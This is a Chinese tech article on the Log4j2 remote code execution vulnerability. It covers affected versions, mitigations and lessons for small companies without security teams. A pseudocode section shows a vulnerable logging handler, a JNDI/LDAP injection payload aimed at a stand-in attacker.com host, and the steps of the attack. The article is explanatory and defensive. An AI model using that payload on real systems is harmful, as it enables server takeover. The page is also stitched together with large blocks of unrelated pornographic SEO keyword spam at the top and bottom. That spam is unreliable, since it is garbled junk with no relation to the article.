精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Log4j史詩級漏洞,我們這些小公司能做些什么?

安全 漏洞
12月10日,看到朋友圈中已經有人在通宵修改、上線系統了。隨即,又看到阿里云安全、騰訊安全部門發出的官方報告:”Apache Log4j2存在遠程代碼執行漏洞“,且漏洞已對外公開。

 [[439896]]

事件背景

12月10日,看到朋友圈中已經有人在通宵修改、上線系統了。隨即,又看到阿里云安全、騰訊安全部門發出的官方報告:”Apache Log4j2存在遠程代碼執行漏洞“,且漏洞已對外公開。

看到相關消息,馬上爬起來把所有項目的日志系統過濾一遍,還好老項目采用的log4j,新項目采用的logback,沒有中招。隨后就看到朋友圈鋪天蓋地的相關消息。

作為一個史詩級的事件,緊急修改漏洞是必然的。作為程序員,如果看到這則消息,連去核查一下系統都做不到,那真的不是一個合格的程序員。

經歷過這次事件,不僅是看熱鬧而已,還要思考一下,作為小公司如何避免、提前預防、做好準備應對這類Bug。

漏洞描述

Apache Log4j2是一款優秀的Java日志框架,與Logback平分秋色,大量主流的開源框架采用了Log4j2,像Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影響。所以,這樣一個底層框架出現問題,影響面可想而知。

漏洞信息:Apache Log4j 2.15.0-rc1 版本存在漏洞繞過,需及時更新至 Apache Log4j 2.15.0-rc2 版本。

影響范圍:2.0 <= Apache log4j2 <= 2.14.1。

最新修復版本:https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

補救方案

方案一:升級版本,發布系統;

方案二:臨時補救:

  • 修改JVM參數,設置 -Dlog4j2.formatMsgNoLookups=true。
  • 在涉及漏洞的項目的類路徑(classpath)下增加log4j2.component.properties配置文件并增加配置項log4j2.formatMsgNoLookups=true。
  • 將系統環境變量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS 設置為 true。

攻擊原理

攻擊偽代碼示例:

  1. import org.apache.log4j.Logger; 
  2.  
  3. import java.io.*; 
  4. import java.sql.SQLException; 
  5. import java.util.*; 
  6.  
  7. public class VulnerableLog4jExampleHandler implements HttpHandler { 
  8.  
  9.   static Logger log = Logger.getLogger(log4jExample.class.getName()); 
  10.  
  11.   /** 
  12.    * 示例偽代碼:一個簡單的HTTP端點,其中讀取User Agent信息并進行日志記錄; 
  13.    */ 
  14.   public void handle(HttpExchange he) throws IOException { 
  15.    // 獲取user-agent信息 
  16.     String userAgent = he.getRequestHeader("user-agent"); 
  17.      
  18.     // 此行記錄日志的代碼,通過記錄攻擊者控制的HTTP用戶代理標頭來觸發RCE。 
  19.     // 攻擊者可以設置他們的User-Agent header到${jndi:ldap://attacker.com/a} 
  20.     log.info("Request User Agent:" + userAgent); 
  21.  
  22.     String response = "<h1>Hello There, " + userAgent + "!</h1>"
  23.     he.sendResponseHeaders(200, response.length()); 
  24.     OutputStream os = he.getResponseBody(); 
  25.     os.write(response.getBytes()); 
  26.     os.close(); 
  27.   } 

基于上述代碼的基本攻擊步驟:

  • 請求對應的HTTP端點(或接口),在請求信息中攜帶攻擊代碼(比如,在user-agent中攜帶${jndi:ldap://attacker.com/a});
  • 服務器在通過Log4j2執行日志記錄時,記錄中包含了基于JNDI和LDAP的惡意負載${jndi:ldap://attacker.com/a},其中attacker.com是攻擊者控制的地址。
  • 記錄日志操作觸發向攻擊者控制的地址發送請求。
  • 對應請求返回在響應中返回可執行的惡意代碼,注入到服務器進程當中。比如返回,https://attacker.com/Attack.class 。
  • 進而執行腳本控制服務器。

騰訊安全專家的復現如下:

log4j2漏洞復現

小公司程序員能做些什么?

關于漏洞及解決方案,上面已經詳細聊了,問題基本得以解決。在大的互聯網企業,是有專門的安全運維部門來監控、掃描這些漏洞的。但在小公司,很顯然沒有這樣的條件。

那么,我們該怎么辦?同時,作為事件的經歷者,你是否思考過這個事件中反映出的一些其他問題嗎?

第一,是否第一時間得到消息?

在大企業,一旦發現這樣的漏洞,安全部門會第一時間進行通知。但在小企業,沒有安全部門,你是如何獲取到漏洞的消息的呢?

比如我所在的企業,是沒有安全部門的,但也幾乎是第一時間得知漏洞消息,進行系統排查的。

作為程序員,如果漏洞消息已經爆出很久,你卻一無所知,那就應該反思一下朋友圈的質量以及對技術熱點的關注度問題了。

如何獲得圈內第一手消息,取決于也反映著你在社交圈或技術圈所處的位置與現狀。

第二,是否置若罔聞?

很多朋友可能也看到了這則漏洞消息,但也就是看一下熱鬧,然后該干嘛干嘛了,系統有漏洞就有漏洞了唄~

如果你是如此,或你的團隊是如此,你真的需要反省一下職業素養問題了。

很多人可能覺得自己很牛,覺得自己懷才不遇,覺得工資收入低,覺得被虧待……那么,對照一下對這件事所作出的反應,基本就知道自己是不是被虧待了。

第三,如何應對突發事件?

這樣的突發事件,也是對系統運維、團隊管理的一個考驗,也是一個仿真練習:大家都正在進行著當前業務的開發,有一個突發Bug要修改,改一半的代碼如何操作?如大面積發布?

第一,改一半的代碼怎么辦?如果你的團隊的代碼開發都是基于master(主干)進行開發、提交代碼,針對這樣的突發事件,必然會面對改了一半的代碼,提交了,想一起發布但還沒測試,這種騎虎難下的局面。

所以,代碼的管理(如何打分支、合并分支、分支與主干代碼不同環境的發布)必須得從日常的點滴做起,當突發事件發生時,也不至于手忙腳亂。

第二,有大量項目需要發布怎么辦?當然,最古老的方式就是一個系統一個系統手動發布。如果是微服務及應用較多,不僅容易出現錯誤,而且耗時較長。這就提醒我們,構建自動化發布流程的重要性。

第四,怎么找出系統漏洞?

有安全部門的公司,會定期掃描系統漏洞,那么沒有安全部門的公司只能坐以待斃嗎?

其實,還是有一些方法可以發現系統的一些漏洞的。比如,勤關注使用框架的版本升級、利用三方提供的漏洞掃描(比如阿里云服務器的安全掃描)、與同行交流等手段。

小結

任何一個漏洞對軟件系統來說都有可能是致命的,也需要我們謹慎對待的。對于漏洞的處理及做出的反應也是從業者職業素養的體現。

而如果能從一次次突發事件中學習、思考到更多內容,你將比別人更快的成長。

責任編輯:武曉燕 來源: 程序新視界
相關推薦

2022-05-30 14:04:23

Log4j遠程代碼漏洞

2021-12-13 01:49:34

漏洞Log4j代碼

2021-12-13 06:56:46

漏洞Log4j對象

2022-03-25 13:42:15

Log4j漏洞網絡安全

2021-12-11 19:04:38

漏洞

2021-12-23 09:47:36

Log4jRCE漏洞DoS漏洞

2022-03-30 11:29:53

漏洞補丁Spring

2021-12-14 23:44:26

漏洞Log4j項目

2021-12-24 09:52:31

Traefik Log4J 漏洞

2022-01-24 10:02:53

漏洞微軟網絡攻擊

2021-12-23 11:03:25

Log4j 漏洞漏洞

2022-01-10 11:54:54

FTCLog4j聯邦貿易委員會

2022-01-06 09:52:39

Log4j漏洞攻擊

2023-11-10 10:08:23

2022-01-02 07:07:55

CISAApache Log4漏洞

2021-12-22 16:53:31

Log4jLog4j庫零日漏洞

2021-12-29 14:47:43

Apache團隊Log4j漏洞

2021-12-16 12:27:15

Log4j漏洞網絡安全

2021-12-21 14:25:01

Log4j2漏洞網絡

2022-02-15 17:51:38

Log4j漏洞網絡安全
點贊
收藏

51CTO技術棧公眾號

免费看黄在线看| 2022国产精品| 亚洲av人人澡人人爽人人夜夜| 最新日本在线观看| 国产成人av影院| 午夜欧美不卡精品aaaaa| 久久久男人的天堂| 涩涩在线视频| 中文字幕一区二区三区在线不卡| 成人女保姆的销魂服务| 色婷婷在线视频观看| 成人av动漫| 91成人在线精品| www.午夜色| 午夜成人免费影院| 日韩高清一级片| 欧美成年人视频网站| 在线免费看黄色片| 成人做爰视频www| 亚洲一二三专区| 色噜噜狠狠色综合网| 999久久久久| 久久激情视频| 欧美激情精品久久久久久| 亚洲天堂久久新| 日本免费一区二区视频| 色国产精品一区在线观看| 杨幂一区欧美专区| 亚洲人妻一区二区三区| 国产自产2019最新不卡| 69久久夜色精品国产69| 日本在线一级片| 在线看成人短视频| 日韩欧美黄色影院| 国产精品无码av无码| 国产探花在线观看| 中文字幕一区二区视频| 欧美成人一区二区在线| 亚洲国产精彩视频| 麻豆91精品91久久久的内涵| 97香蕉久久超级碰碰高清版| 国产极品美女在线| 免费观看久久av| 欧美xingq一区二区| 色悠悠久久综合网| 亚洲最大成人| 亚洲成av人片| 大桥未久一区二区三区| 国产视频第一页在线观看| 成人福利视频在线看| 成人国产精品一区| 欧美 亚洲 另类 激情 另类| 99精品久久久| 久久久久久久国产| 国产这里有精品| 久久久久午夜电影| 日韩中文在线不卡| 日本少妇激三级做爰在线| 黄色精品视频| 日本高清成人免费播放| 国产网站免费在线观看| 国产一线二线在线观看| 玉米视频成人免费看| 天天做天天爱天天高潮| 在线观看a视频| 欧美激情一区二区三区全黄| 日本黄网免费一区二区精品| 香蕉视频免费在线看| 国产aⅴ精品一区二区三区色成熟| 亚洲精品欧美极品| 国产免费黄色片| 紧缚奴在线一区二区三区| 成人春色激情网| 国产男女猛烈无遮挡| 国产自产v一区二区三区c| 91社区国产高清| 国产片高清在线观看| 国产一区二区在线视频| 成人欧美一区二区三区黑人孕妇| 在线免费看av片| 久草中文综合在线| 亚洲综合在线播放| 欧美在线 | 亚洲| 不卡的电视剧免费网站有什么| 国产一区二区三区无遮挡| 天天射,天天干| 久久亚洲二区三区| 色婷婷精品国产一区二区三区| av网站无病毒在线| 成人欧美一区二区三区黑人麻豆 | 欧洲av不卡| 在线观看不卡视频| 亚洲综合欧美在线| 天堂久久av| 国产婷婷色综合av蜜臀av| 精品欧美一区二区久久久| 99久久www免费| 久久男人的天堂| 无码人妻精品一区二区50| 麻豆高清免费国产一区| 18成人免费观看网站下载| 囯产精品一品二区三区| av一区二区久久| 性欧美精品一区二区三区在线播放 | 欧美中文字幕一二三区视频| 日本精品一区在线| 久久久久久毛片免费看| 夜夜嗨av色综合久久久综合网| h色网站在线观看| 亚洲高清在线| 国产精品久久久av久久久| 久久精品偷拍视频| 国产精选一区二区三区| 欧美大香线蕉线伊人久久| 国产高清免费在线播放| 亚洲女子a中天字幕| 18岁网站在线观看| 国产美女亚洲精品7777| 亚洲女同精品视频| 国产精品成人免费观看| 日韩精品亚洲专区| yellow视频在线观看一区二区| 欧美新色视频| 亚洲主播在线播放| 最新天堂中文在线| 国产精品欧美一区二区三区不卡 | 欧美国产日韩另类| 一区二区三区日本久久久 | 不卡av免费观看| 欧美日韩五月天| 亚洲av网址在线| 日韩大片在线播放| 97香蕉久久超级碰碰高清版| 国产精品久久免费| 久久嫩草精品久久久精品一| 国产91沈先生在线播放| 欧美xxxx网站| 亚洲人成电影在线| 亚洲精品www久久久久久| 国产另类ts人妖一区二区| 色99中文字幕| 搞黄网站在线看| 欧美一区二区三区色| 亚洲精品国产一区黑色丝袜| 亚洲精品影院在线观看| 97av自拍| 男人和女人做事情在线视频网站免费观看| 高跟丝袜欧美一区| 稀缺呦国内精品呦| 欧美 日韩 国产一区二区在线视频| 国产精品久久久av久久久| 久久综合九色综合久| 日韩欧美国产中文字幕| 在线免费观看污视频| 亚洲视频久久| 国产欧美精品在线播放| 69av在线| 在线不卡中文字幕播放| 日本裸体美女视频| 美日韩一区二区| 日韩wuma| 99久久久国产精品免费调教网站| 亚洲片在线资源| 免费黄色av片| 国产蜜臀av在线一区二区三区| 免费看黄在线看| 加勒比久久高清| 国产69精品久久久久久| 日本黄在线观看| 色狠狠综合天天综合综合| 蜜桃av免费看| 丝袜美腿亚洲一区二区图片| 欧美在线日韩精品| 欧美日韩国产网站| 一区二区三欧美| 国产一区二区女内射| 亚洲欧美一区二区久久| 天天久久综合网| 欧美激情第二页| 国产精品二区二区三区| 日韩av影片| 精品亚洲一区二区三区在线播放| 日韩精品成人免费观看视频| 国产亚洲va综合人人澡精品| 欧美日韩在线成人| 91视频一区| 国产福利久久精品| 日韩伦理在线| 最新亚洲国产精品| 国产白浆在线观看| 午夜久久久影院| 亚洲第一页av| 精品系列免费在线观看| 欧美一级免费播放| 精品国产乱码久久久| 国产精品美女在线| 天堂8中文在线| 亚洲天堂日韩电影| 风流少妇一区二区三区91| 91福利精品第一导航| 国产稀缺真实呦乱在线| 国产精品入口麻豆原神| 亚洲一区二区三区无码久久| 极品少妇xxxx偷拍精品少妇| 九九九九免费视频| 欧美视频成人| 一区二区三区不卡在线| 久久91麻豆精品一区| 成人做爰66片免费看网站| 九九热这里有精品| 欧美一级片免费在线| 麻豆av在线免费观看| www.亚洲天堂| 黄色影院在线播放| 亚洲第一网站免费视频| 99热这里只有精品9| 在线看国产一区| 五月婷婷亚洲综合| 亚洲国产欧美日韩另类综合| 91狠狠综合久久久| 欧美国产精品一区二区三区| 中文乱码人妻一区二区三区视频| 国产一区二区看久久| 亚洲xxxx2d动漫1| 久久国产日韩| 国产性xxxx18免费观看视频| 亚洲网站啪啪| 国产91沈先生在线播放| 欧美在线播放| 久久最新免费视频| 91亚洲一区| 一区二区三区久久网| 日韩av自拍| 亚洲精品不卡| 日韩在线看片| 性欧美大战久久久久久久免费观看| 亚洲人和日本人hd| 欧美乱偷一区二区三区在线| 成人av综合网| 精品999在线观看| 欧美电影免费网站| 久久精品国产第一区二区三区最新章节 | 日本激情视频在线观看| 在线精品国产成人综合| 国产高清视频免费最新在线| 国产亚洲精品久久| 国产裸舞福利在线视频合集| 亚洲视频国产视频| 九色国产在线观看| 伊人久久五月天| 日本在线看片免费人成视1000| 中文字幕在线精品| 毛片在线看片| 欧美激情久久久| www.8ⅹ8ⅹ羞羞漫画在线看| 97在线观看免费| 电影一区二区三区| 国产欧美一区二区三区久久 | 成人高清在线观看| 久久人人爽人人爽人人片av不| 久久国产精品免费一区| 国产成人调教视频在线观看| 亚洲精品国产精品久久| 91精品秘密在线观看| 国产小视频免费| 先锋亚洲精品| 超碰在线97免费| 精品一二三四区| 亚洲国产精品第一页| 97久久精品人人爽人人爽蜜臀| 亚洲区自拍偷拍| 国产精品电影一区二区三区| 久草视频在线资源| 色婷婷精品久久二区二区蜜臂av| 午夜一区二区三区四区| 日韩一区二区精品在线观看| 污污视频在线免费看| 一区二区三区动漫| 国产美女av在线| 91精品国产高清久久久久久91| 高清成人在线| 亚洲xxxxx性| 伊人精品一区| 欧美另类videos| 香蕉久久久久久久av网站| 欧美成人乱码一二三四区免费| 国产成人精品三级麻豆| 短视频在线观看| 亚洲私人黄色宅男| 亚洲伊人成人网| 欧美精品乱码久久久久久| 天天综合天天综合| 上原亚衣av一区二区三区| 久久99亚洲网美利坚合众国| 国产精品久久久久久久久久ktv | 国产亚洲欧美久久久久| 欧美性xxxx在线播放| 国产女人18毛片水18精| 亚洲视频专区在线| 久久www人成免费看片中文| 国产精品入口免费视| 国产劲爆久久| 一区二区三区视频在线播放| 亚洲激情精品| 免费不卡av网站| 久久精品日韩一区二区三区| 久久久久成人片免费观看蜜芽| 91国偷自产一区二区三区观看| 午夜精品小视频| 最新中文字幕亚洲| 周于希免费高清在线观看 | 精品国产一区二区三区噜噜噜 | 精品一区二区在线视频| 999精品免费视频| 亚洲欧美激情小说另类| 免费无码国产精品| 日韩久久免费电影| 国产啊啊啊视频在线观看| 91视频-88av| 日韩夫妻性生活xx| 成人观看免费完整观看| 成人高清在线视频| 久久久久亚洲av成人片| 欧美日韩国产一级| 精品无吗乱吗av国产爱色| 97视频免费看| 精品嫩草影院| 欧美大黑帍在线播放| 国产福利精品一区| 日韩影院一区二区| 欧美高清你懂得| 97视频精彩视频在线观看| 国产成人啪精品视频免费网| 欧美五码在线| 极品美女扒开粉嫩小泬| 成人黄色综合网站| 国产一级特黄a高潮片| 日韩欧美成人激情| 污视频网站免费在线观看| 91美女片黄在线观看游戏| 欧美激情另类| 天天综合成人网| 亚洲精品日产精品乱码不卡| 国产乱淫av片免费| 欧美另类交人妖| 欧美久久亚洲| 麻豆传媒网站在线观看| 国产剧情在线观看一区二区| 久久r这里只有精品| 91精品国产综合久久久久久漫画| 免费看美女视频在线网站| 成人av资源在线播放| 一区二区中文字| 极品白嫩少妇无套内谢| 亚洲一区二区四区蜜桃| 欧美一级性视频| 欧美一级片免费在线| 少妇精品久久久| 91欧美视频在线| 亚洲三级电影全部在线观看高清| 99久久精品国产成人一区二区| 大胆人体色综合| 国内视频在线精品| 色综合av综合无码综合网站| 国产蜜臀97一区二区三区| 女同一区二区| 国产精品女主播| 国产精品美女久久久久久不卡 | 国产一区自拍视频| 国产日韩一区| 国产综合精品在线| 制服丝袜av成人在线看| 福利在线导航136| 欧美在线视频一区二区三区| 日韩av中文字幕一区二区| 日韩av网站在线播放| 欧美大片在线观看一区| 老色鬼在线视频| 亚洲视频小说| 国产成人自拍在线| 久久国产黄色片| 日韩在线观看免费av| 国产精品调教视频| 五月婷婷激情久久| 一区二区免费视频| 国产爆初菊在线观看免费视频网站 | 色综合一区二区日本韩国亚洲| 桥本有菜av在线| 91污片在线观看| ,亚洲人成毛片在线播放| 欧美激情在线狂野欧美精品| 久久av影视| 成年人性生活视频| 色综合久久天天| 18+激情视频在线| 日本一区二区精品| 福利一区福利二区| 中文字幕永久在线视频| 性欧美在线看片a免费观看| 婷婷综合伊人|